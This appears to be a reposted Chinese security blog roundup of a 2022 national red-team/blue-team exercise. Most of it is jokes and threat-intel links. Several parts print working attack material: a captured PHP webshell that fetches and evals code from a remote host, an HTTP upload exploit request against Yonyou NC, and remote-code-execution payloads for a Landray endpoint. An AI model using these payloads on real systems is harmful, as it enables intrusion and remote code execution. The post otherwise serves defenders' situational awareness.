2022国HVV已经过去两夜了,昨晚是夜黑风高出局夜还是平安夜?从昨天一整天微步帖子的情况来看,总的趋势是红队一直在进行low手法的投毒钓鱼,蓝队一直在封IP,来具体看一下过去一天发生了啥~
1. APT还是RT?
蓝队的兄弟可还真不容易,捕获样本还得判断是APT还是红队~
2.这届红队是只会投毒钓鱼么?
从早上六点多就有人又再开始钓鱼投毒了:
这战术早已对蓝队无效,活该惹来一顿骂:
此种攻击蓝队早已是见招拆招:
钓鱼项目:https://github.com/fofahub/fofahubkey
蓝队:(https://x.threatbook.com/v5/article?threatInfoID=17404)
随后微步对样本进行分析:(https://x.threatbook.com/v5/article?threatInfoID=18087)
红队一根筋地投毒钓鱼:
没啥意思,手里没0day还叫啥红队,有0day赶紧砸过来~
3.对于红队的投毒钓鱼,蓝队只想说
4.蓝队兄弟:送一波Redteam名单 你们还好吗?
https://x.threatbook.com/v5/article?threatInfoID=17682
送走一个算一个:
注:223.104.42.127 这个IP利用了泛微6月修复的0day /workrelate/plan/util/uploaderOperate.jsp
5.A1小姐姐是谁?
图片来源:每天一个入狱小技巧
(https://mp.weixin.qq.com/s/PekmUlDcKYWs7w2NfEMOww)
似乎是YY出来的,见过这样钓鱼的么?
蓝队回应:
6.捕获红队webshell
http://tongyong888.xyz/cmd.txt:
Gif89a$c=&$cv;$cv='http://tongyong888.xyz/dama.txt';$b=file_get_contents($c);@eval('?>'.`/******/`.$b);
http://tongyong888.xyz/dama.txt:
7.段子段子,你们要的段子
(1)我是没有策略的防火墙:
(2)红队兄弟,你们累么?
(3)好像总感觉哪里不对:
(4)重磅:HW战神十,它终于来了
https://x.threatbook.com/v5/article?threatInfoID=18563
8.某HW情报交流群
红队吃啥?似乎一菜一汤
贴心甲方准备了药?
9.奇安信摸鱼办:高价悬赏近期演练期间1day分析文章
https://forum.butian.net/question/611
大佬们赶紧上啊~
10.day呢?要看真正的情报?
https://x.threatbook.com/v5/article?threatInfoID=18531
疑似用友NC 0day:
payload=POST /aim/equipmap/accept.jsp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Content-Length: 436Accept: text/htmlConnection: closeContent-Type: multipart/form-data; boundary=---------------------------16314487820932200903769468567Accept-Encoding: gzip-----------------------------16314487820932200903769468567Content-Disposition: form-data; name="upload"; filename="222222.txt"Content-Type: text/plain<% out.println("bea86d66a5278f9e6fa1112d2e2fcebf"); %>-----------------------------16314487820932200903769468567Content-Disposition: form-data; name="fname"webappsnc_web180900fd668c51631353aca37fc1f829.jsp-----------------------------16314487820932200903769468567--;tcp.flags=24;tcp.flags.syn=0;tcp.flags.ack=1;tcp.flags.reset=0;tcp.flags.fin=0;tcp.flags.push=1;tcp.flags.urg=0;tcp.seq=2292457002;tcp.nxtseq=956110407;tcp.window_size=229
蓝凌treexml路由RCE(xday):
method: POST path:'{{BaseURL}}/data/sys-common/treexml.tmpl' body: s_bean=ruleFormulaValidate&script=try {String cmd = "ping {{interactsh-url}}";Process child = Runtime.getRuntime().exec(cmd);} catch (IOException e) {System.err.println(e);} headers: Pragma: no-cache Content-Type: application/x-www-form-urlencoded科来全流量里搜特征:/data/sys-common/treexml.tmpl和exec(cmd)
Coremail邮件客户端0day:
https://mp.weixin.qq.com/s/nq3yIInv8-79J_vTnQUzSw
大佬们赶紧上啊,写分析文章投稿奇安信攻防社区,让我们这些脚本小子也早日用上新day呀
对了,还有一个在野 0day:
POST /data/sys-common/treexml.jVAV HTTP/1.1Host: xxx.xxx.xxxUser-Agent: curl/7.55.1Accept: */*Referer: http://xx.xxx.comContent-Type: application/x-www-form-urlencodedConnection: closes_bean=ruleFormulaValidate&script=S0ZDX0NyYXp5X1RodXJzZGF5X1ZfTWVfNTA=
猜猜是啥(偷笑)
最后,想说一句:蓝队的兄弟们今天加油啊~,我挺你们!!!
原文始发于微信公众号(沃克学安全):2022国HVV—7月26日瓜来
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论